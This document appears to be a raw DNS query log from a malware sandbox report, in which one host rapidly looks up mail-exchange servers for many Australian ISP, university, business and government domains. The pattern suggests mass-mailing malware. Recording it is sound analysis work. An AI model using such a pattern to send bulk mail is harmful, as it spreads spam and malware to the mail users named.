                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:32.308396101 CET192.168.2.38.8.8.80x79acStandard query (0)extmail.optusnet.com.auA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:32.331571102 CET192.168.2.38.8.8.80xa66dStandard query (0)uq.edu.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:32.350819111 CET192.168.2.38.8.8.80x28bStandard query (0)mx1.hc86-32.ap.iphmx.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:32.427622080 CET192.168.2.38.8.8.80x8efbStandard query (0)iinet.net.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:32.445888042 CET192.168.2.38.8.8.80xd6d8Standard query (0)asav.iinet.net.auA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:32.511734962 CET192.168.2.38.8.8.80xa9a6Standard query (0)optusnet.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:32.541286945 CET192.168.2.38.8.8.80x4c6aStandard query (0)extmail.optusnet.com.auA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:32.586664915 CET192.168.2.38.8.8.80xd618Standard query (0)msn.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:32.612638950 CET192.168.2.38.8.8.80x4f27Standard query (0)extmail.msn.bigpond.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:32.664730072 CET192.168.2.38.8.8.80x1f4aStandard query (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:32.683013916 CET192.168.2.38.8.8.80xbb20Standard query (0)mta6.am0.yahoodns.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:32.754846096 CET192.168.2.38.8.8.80x99c7Standard query (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:32.776807070 CET192.168.2.38.8.8.80xb0dStandard query (0)mta6.am0.yahoodns.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:32.840658903 CET192.168.2.38.8.8.80x18bfStandard query (0)tyndale.edu.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:32.910895109 CET192.168.2.38.8.8.80xd09dStandard query (0)ASPMX2.GOOGLEMAIL.COMA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:32.911133051 CET192.168.2.38.8.8.80x43fdStandard query (0)mst.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:32.975936890 CET192.168.2.38.8.8.80xaa55Standard query (0)mx1-us1.ppe-hosted.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:33.007685900 CET192.168.2.38.8.8.80x8764Standard query (0)iimetro.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:33.029347897 CET192.168.2.38.8.8.80x3e12Standard query (0)asav.iinet.net.auA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:33.108653069 CET192.168.2.38.8.8.80xc3baStandard query (0)guardian.net.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:33.194451094 CET192.168.2.38.8.8.80xb3deStandard query (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:33.215396881 CET192.168.2.38.8.8.80x719eStandard query (0)mta7.am0.yahoodns.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:33.285090923 CET192.168.2.38.8.8.80x4c46Standard query (0)amp.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:33.310121059 CET192.168.2.38.8.8.80x4e6fStandard query (0)amp-com-au.mail.protection.outlook.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:33.386401892 CET192.168.2.38.8.8.80xb8c3Standard query (0)filter1.guardi-1.mailguard.com.auA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:33.398138046 CET192.168.2.38.8.8.80xa8f7Standard query (0)iinet.net.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:33.442104101 CET192.168.2.38.8.8.80x1263Standard query (0)asav.iinet.net.auA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:33.472872019 CET192.168.2.38.8.8.80xd71eStandard query (0)hiotmail.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:33.628262997 CET192.168.2.38.8.8.80xb6cbStandard query (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:33.647159100 CET192.168.2.38.8.8.80x31a9Standard query (0)mta6.am0.yahoodns.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:33.683047056 CET192.168.2.38.8.8.80xe78bStandard query (0)student.uts.edu.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:33.718146086 CET192.168.2.38.8.8.80x5472Standard query (0)au-smtp-inbound-1.mimecast.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:33.787154913 CET192.168.2.38.8.8.80x7fd3Standard query (0)harveyschoice.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:33.884085894 CET192.168.2.38.8.8.80xa1bbStandard query (0)ser.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:33.957994938 CET192.168.2.38.8.8.80xda05Standard query (0)optusnet.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:33.974817038 CET192.168.2.38.8.8.80x6be2Standard query (0)ser-com-au.mail.protection.outlook.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:33.978216887 CET192.168.2.38.8.8.80x6a9aStandard query (0)extmail.optusnet.com.auA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:34.023716927 CET192.168.2.38.8.8.80xdad3Standard query (0)mx1.forwardemail.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:34.042737961 CET192.168.2.38.8.8.80xb0cfStandard query (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:34.094623089 CET192.168.2.38.8.8.80xeb0fStandard query (0)mta6.am0.yahoodns.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:34.134743929 CET192.168.2.38.8.8.80xc744Standard query (0)exemail.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:34.166790009 CET192.168.2.38.8.8.80x6a89Standard query (0)mx.spamexperts.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:34.214803934 CET192.168.2.38.8.8.80xbdfbStandard query (0)iinet.net.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:34.238426924 CET192.168.2.38.8.8.80x135aStandard query (0)asav.iinet.net.auA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:34.290771961 CET192.168.2.38.8.8.80x70feStandard query (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:34.315771103 CET192.168.2.38.8.8.80xb7b0Standard query (0)mta6.am0.yahoodns.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:34.354607105 CET192.168.2.38.8.8.80xf52fStandard query (0)student.curtin.edu.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:34.439167976 CET192.168.2.38.8.8.80xd71eStandard query (0)hiotmail.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:34.467397928 CET192.168.2.38.8.8.80x4a68Standard query (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:34.494899988 CET192.168.2.38.8.8.80x46c3Standard query (0)mta6.am0.yahoodns.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:34.570077896 CET192.168.2.38.8.8.80xc02dStandard query (0)flinders.edu.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:34.629322052 CET192.168.2.38.8.8.80x4610Standard query (0)ramsayhealth.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:34.650904894 CET192.168.2.38.8.8.80xa18Standard query (0)au-smtp-inbound-1.mimecast.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:34.696520090 CET192.168.2.38.8.8.80x111cStandard query (0)eq.edu.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:34.711385012 CET192.168.2.38.8.8.80xdd9aStandard query (0)student-curtin-edu-au.mail.protection.outlook.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:34.728866100 CET192.168.2.38.8.8.80xb3cfStandard query (0)eq-edu-au.mail.protection.outlook.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:34.785798073 CET192.168.2.38.8.8.80x3f3aStandard query (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:34.817002058 CET192.168.2.38.8.8.80x6408Standard query (0)mta6.am0.yahoodns.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:34.833286047 CET192.168.2.38.8.8.80x3505Standard query (0)edu.eq.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:34.903314114 CET192.168.2.38.8.8.80xff23Standard query (0)eslec.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:34.905376911 CET192.168.2.38.8.8.80x1d80Standard query (0)au-smtp-inbound-1.mimecast.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:34.976577044 CET192.168.2.38.8.8.80x4567Standard query (0)aspmx.l.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:35.009390116 CET192.168.2.38.8.8.80x2127Standard query (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:35.042953968 CET192.168.2.38.8.8.80xdeeStandard query (0)mta7.am0.yahoodns.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:35.112096071 CET192.168.2.38.8.8.80x284fStandard query (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:35.131431103 CET192.168.2.38.8.8.80x9b41Standard query (0)mta6.am0.yahoodns.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:35.196976900 CET192.168.2.38.8.8.80x8fbfStandard query (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:35.217746973 CET192.168.2.38.8.8.80xe20Standard query (0)mta6.am0.yahoodns.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:35.307184935 CET192.168.2.38.8.8.80x1f10Standard query (0)dhs.vic.gov.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:35.328099012 CET192.168.2.38.8.8.80x58c0Standard query (0)mxa-001fc401.gslb.pphosted.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:35.382488012 CET192.168.2.38.8.8.80x366eStandard query (0)avivagroup.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:35.491600990 CET192.168.2.38.8.8.80x6026Standard query (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:35.515564919 CET192.168.2.38.8.8.80xaaaStandard query (0)mta6.am0.yahoodns.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:35.566386938 CET192.168.2.38.8.8.80xde32Standard query (0)tio.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:35.587047100 CET192.168.2.38.8.8.80x5109Standard query (0)park-mx.above.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:35.636010885 CET192.168.2.38.8.8.80xa849Standard query (0)inchcape.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:35.722735882 CET192.168.2.38.8.8.80x9231Standard query (0)imcc.wa.edu.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:35.742052078 CET192.168.2.38.8.8.80x3162Standard query (0)imcc-wa-edu-au.mail.protection.outlook.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:35.800930977 CET192.168.2.38.8.8.80xe12Standard query (0)mx07-00031601.pphosted.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:35.815113068 CET192.168.2.38.8.8.80xbe41Standard query (0)newyearsparty.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:35.892458916 CET192.168.2.38.8.8.80x14f5Standard query (0)cluster5a.us.messagelabs.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:35.907917976 CET192.168.2.38.8.8.80x7dfeStandard query (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:35.927975893 CET192.168.2.38.8.8.80x1c7dStandard query (0)mta5.am0.yahoodns.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:35.994729042 CET192.168.2.38.8.8.80xe8c1Standard query (0)bigpond.net.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:36.015386105 CET192.168.2.38.8.8.80xf89aStandard query (0)extmail.bpbb.bigpond.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:36.104625940 CET192.168.2.38.8.8.80x35e3Standard query (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:36.150826931 CET192.168.2.38.8.8.80x82fcStandard query (0)mta5.am0.yahoodns.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:36.167001009 CET192.168.2.38.8.8.80x1f05Standard query (0)hum.au.dkMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:36.242489100 CET192.168.2.38.8.8.80x8fc5Standard query (0)hum-au-dk.mail.protection.outlook.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:36.257523060 CET192.168.2.38.8.8.80x3b36Standard query (0)westnet.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:36.290374041 CET192.168.2.38.8.8.80x7680Standard query (0)asav2.iinet.net.auA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:36.321074963 CET192.168.2.38.8.8.80x7c7eStandard query (0)iprimus.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:36.349208117 CET192.168.2.38.8.8.80x3185Standard query (0)mx.syd.iprimus.com.auA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:36.379916906 CET192.168.2.38.8.8.80x6845Standard query (0)meritonsales.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:36.491044044 CET192.168.2.38.8.8.80xc9ffStandard query (0)bigpond.net.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:36.511620998 CET192.168.2.38.8.8.80x735fStandard query (0)extmail.bpbb.bigpond.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:36.582432032 CET192.168.2.38.8.8.80xfeeaStandard query (0)netc.net.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:36.605603933 CET192.168.2.38.8.8.80x24afStandard query (0)asav.iinet.net.auA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:36.676125050 CET192.168.2.38.8.8.80x20bbStandard query (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:36.696329117 CET192.168.2.38.8.8.80x3c40Standard query (0)mta7.am0.yahoodns.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:36.739762068 CET192.168.2.38.8.8.80xee39Standard query (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:36.760390043 CET192.168.2.38.8.8.80x3f32Standard query (0)mta5.am0.yahoodns.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:36.838596106 CET192.168.2.38.8.8.80x7a9bStandard query (0)cluster5.us.messagelabs.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:36.839248896 CET192.168.2.38.8.8.80xd430Standard query (0)westnet.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:36.858745098 CET192.168.2.38.8.8.80x45aeStandard query (0)asav2.iinet.net.auA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:36.919568062 CET192.168.2.38.8.8.80xd089Standard query (0)isikcollege.vic.edu.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:36.998219967 CET192.168.2.38.8.8.80x15Standard query (0)webmail.isikcollege.vic.edu.auA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:36.999675035 CET192.168.2.38.8.8.80xfa43Standard query (0)idx.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:37.057826042 CET192.168.2.38.8.8.80x685aStandard query (0)eq.edu.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:37.077675104 CET192.168.2.38.8.8.80x39fbStandard query (0)eq-edu-au.mail.protection.outlook.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:37.151088953 CET192.168.2.38.8.8.80xcb17Standard query (0)banksgroup.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:37.209014893 CET192.168.2.38.8.8.80x91e5Standard query (0)mail.idx.com.auA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:37.224412918 CET192.168.2.38.8.8.80x7b03Standard query (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:37.250909090 CET192.168.2.38.8.8.80x6cb2Standard query (0)mta6.am0.yahoodns.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:37.429305077 CET192.168.2.38.8.8.80xe3fStandard query (0)banksgroup-com-au.mail.protection.outlook.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:37.432226896 CET192.168.2.38.8.8.80xb4d3Standard query (0)imcc.wa.edu.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:37.514256954 CET192.168.2.38.8.8.80x81b0Standard query (0)westnet.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:37.563633919 CET192.168.2.38.8.8.80x7d63Standard query (0)asav.iinet.net.auA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:37.571285009 CET192.168.2.38.8.8.80x1123Standard query (0)iinet.net.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:37.592925072 CET192.168.2.38.8.8.80x972aStandard query (0)asav2.iinet.net.auA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:37.594214916 CET192.168.2.38.8.8.80x233bStandard query (0)imcc-wa-edu-au.mail.protection.outlook.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:37.636950970 CET192.168.2.38.8.8.80x3e98Standard query (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:37.674010992 CET192.168.2.38.8.8.80xc4f7Standard query (0)mta5.am0.yahoodns.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:37.743623018 CET192.168.2.38.8.8.80x9752Standard query (0)usc.edu.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:37.817259073 CET192.168.2.38.8.8.80x7cd2Standard query (0)au-smtp-inbound-1.mimecast.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:37.836724997 CET192.168.2.38.8.8.80xd696Standard query (0)bigpond.net.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:37.859515905 CET192.168.2.38.8.8.80xdd29Standard query (0)extmail.bpbb.bigpond.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:37.947700977 CET192.168.2.38.8.8.80xc6d5Standard query (0)marchesepartners.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:38.015655041 CET192.168.2.38.8.8.80xe3dbStandard query (0)assetbacked.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:38.150036097 CET192.168.2.38.8.8.80x62beStandard query (0)airnet.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:38.151134014 CET192.168.2.38.8.8.80x2339Standard query (0)marchesepartners-com-au.mail.protection.outlook.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:38.207611084 CET192.168.2.38.8.8.80xaef2Standard query (0)optusnet.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:38.234949112 CET192.168.2.38.8.8.80x4263Standard query (0)extmail.optusnet.com.auA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:38.317528963 CET192.168.2.38.8.8.80xe8faStandard query (0)optusnet.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:38.385386944 CET192.168.2.38.8.8.80x3d4cStandard query (0)extmail.optusnet.com.auA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:38.401252985 CET192.168.2.38.8.8.80xa3dbStandard query (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:38.497625113 CET192.168.2.38.8.8.80x76d8Standard query (0)mta7.am0.yahoodns.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:38.562097073 CET192.168.2.38.8.8.80x20e2Standard query (0)asav.tpg.com.auA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:38.563373089 CET192.168.2.38.8.8.80x3aaaStandard query (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:38.583745003 CET192.168.2.38.8.8.80xdff1Standard query (0)mta6.am0.yahoodns.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:38.653357983 CET192.168.2.38.8.8.80x10b8Standard query (0)optusnet.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:38.680699110 CET192.168.2.38.8.8.80xbb25Standard query (0)extmail.optusnet.com.auA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:38.738325119 CET192.168.2.38.8.8.80x2aa9Standard query (0)optusnet.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:38.762012959 CET192.168.2.38.8.8.80xc069Standard query (0)extmail.optusnet.com.auA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:38.824265957 CET192.168.2.38.8.8.80xb83dStandard query (0)ab.auone-net.jpMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:38.844722986 CET192.168.2.38.8.8.80xd53fStandard query (0)mx01.auone-net.jpA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:38.900456905 CET192.168.2.38.8.8.80xb17cStandard query (0)phed.auth.grMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:38.995001078 CET192.168.2.38.8.8.80xb744Standard query (0)transmin.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:39.013108015 CET192.168.2.38.8.8.80xf220Standard query (0)mailsrv1.ccf.auth.grA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:39.084563971 CET192.168.2.38.8.8.80x6a2eStandard query (0)transmin-com-au.mail.protection.outlook.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:39.091862917 CET192.168.2.38.8.8.80x692Standard query (0)optusnet.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:39.115823030 CET192.168.2.38.8.8.80x8a9Standard query (0)extmail.optusnet.com.auA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:39.211059093 CET192.168.2.38.8.8.80xc440Standard query (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:39.232913017 CET192.168.2.38.8.8.80x7b5bStandard query (0)mta6.am0.yahoodns.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:39.305687904 CET192.168.2.38.8.8.80x8eeaStandard query (0)flightcentre.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:39.394577980 CET192.168.2.38.8.8.80x30abStandard query (0)au-smtp-inbound-1.mimecast.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:39.409528971 CET192.168.2.38.8.8.80xa826Standard query (0)optushome.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:39.479115009 CET192.168.2.38.8.8.80x9d8bStandard query (0)chivertonwines.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:39.597631931 CET192.168.2.38.8.8.80xee61Standard query (0)optusnet.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:39.604187012 CET192.168.2.38.8.8.80x2ee6Standard query (0)chivertonwines-com-au.mail.protection.outlook.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:39.618469954 CET192.168.2.38.8.8.80x1841Standard query (0)extmail.optusnet.com.auA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:39.681854963 CET192.168.2.38.8.8.80x5337Standard query (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:39.704251051 CET192.168.2.38.8.8.80x3e43Standard query (0)mta7.am0.yahoodns.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:39.708496094 CET192.168.2.38.8.8.80x64cfStandard query (0)mail.optusnet.com.auA (IP address)IN (0x0001)false
